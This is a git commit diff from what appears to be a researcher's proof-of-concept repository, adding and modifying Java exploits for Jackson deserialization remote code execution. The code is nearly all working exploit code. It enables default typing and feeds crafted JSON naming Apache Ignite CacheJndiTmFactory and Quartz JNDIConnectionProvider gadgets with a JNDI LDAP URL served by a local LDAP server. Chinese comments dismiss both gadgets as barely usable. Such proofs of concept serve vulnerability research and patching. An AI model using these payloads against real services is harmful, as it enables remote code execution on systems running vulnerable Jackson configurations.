fix:两个鸡肋中的鸡肋gadget

“threedr3am” · “threedr3am” · commit b9a9ddf57454 · 2020-03-16T19:27:10.000+08:00
diff --git a/jackson/src/main/java/com/threedr3am/bug/jackson/rce/IgniteJtaPoc2.java b/jackson/src/main/java/com/threedr3am/bug/jackson/rce/IgniteJtaPoc2.java
@@ -0,0 +1,51 @@
+package com.threedr3am.bug.jackson.rce;
+
+import com.fasterxml.jackson.databind.ObjectMapper;
+import com.threedr3am.bug.common.server.LdapServer;
+import java.io.IOException;
+import org.apache.ignite.cache.jta.jndi.CacheJndiTmFactory;
+
+/**
+ *
+ * 鸡肋中的鸡肋，需要调用 ((CacheJndiTmFactory) o).create() 才能触发
+ *
+ * ignite jta gadget
+ *
+ * Mitre id:
+ * Reporters:
+ *
+ * Fix will be included in:
+ *
+ * 2.9.10.4
+ * Does not affect 2.10.0 and later
+ *
+ * <dependency>
+ *       <groupId>org.apache.ignite</groupId>
+ *       <artifactId>ignite-jta</artifactId>
+ *       <version>2.8.0</version>
+ * </dependency>
+ *
+ * @author threedr3am
+ */
+public class IgniteJtaPoc2 {
+
+  static {
+    //rmi server示例
+//    RmiServer.run();
+
+    //ldap server示例
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) throws IOException {
+    ObjectMapper mapper = new ObjectMapper();
+    mapper.enableDefaultTyping();
+
+    //最近看到的gadget怎么尽是鸡肋的鸡肋
+    String json = "[\"org.apache.ignite.cache.jta.jndi.CacheJndiTmFactory\", {\"jndiNames\": [\"ldap://localhost:43658/Calc\"]}]";
+    Object o = mapper.readValue(json, Object.class);
+    ((CacheJndiTmFactory) o).create();
+    
+  }
+
+}
diff --git a/jackson/src/main/java/com/threedr3am/bug/jackson/rce/QuartzPoc.java b/jackson/src/main/java/com/threedr3am/bug/jackson/rce/QuartzPoc.java
@@ -1,10 +1,15 @@
 package com.threedr3am.bug.jackson.rce;
 
+import com.fasterxml.jackson.annotation.JsonCreator;
+import com.fasterxml.jackson.annotation.JsonProperty;
 import com.fasterxml.jackson.databind.ObjectMapper;
 import com.threedr3am.bug.common.server.LdapServer;
 import java.io.IOException;
+import org.quartz.utils.JNDIConnectionProvider;
 
 /**
+ * 比鸡肋还鸡肋的gadget
+ *
  * @author threedr3am
  */
 public class QuartzPoc {
@@ -21,10 +26,17 @@ public static void main(String[] args) throws IOException {
     ObjectMapper mapper = new ObjectMapper();
     mapper.enableDefaultTyping();
 
-    //todo 不知为何官方加这个黑名单，明明构造方法形式最多只能选择1个参数的构造方法，而听说有人居然复现成功了？？？...
-    String json = "[\"org.quartz.utils.JNDIConnectionProvider\", \"ldap://localhost:43658/Calc\", false]";
+    //复现是复现了，但是这样的payload恕我直言，比鸡肋还鸡肋
+    mapper.addMixIn(JNDIConnectionProvider.class, AbstractJNDIConnectionProvider.class);
+    String json = "[\"org.quartz.utils.JNDIConnectionProvider\", {\"jndiUrl\": \"ldap://localhost:43658/Calc\"}]";
     mapper.readValue(json, Object.class);
   }
 
 
 }
+abstract class AbstractJNDIConnectionProvider extends JNDIConnectionProvider{
+  @JsonCreator
+  public AbstractJNDIConnectionProvider( @JsonProperty("jndiUrl") String jndiUrl, @JsonProperty ("alwaysLookup") boolean alwaysLookup) {
+    super(jndiUrl, alwaysLookup);
+  }
+}
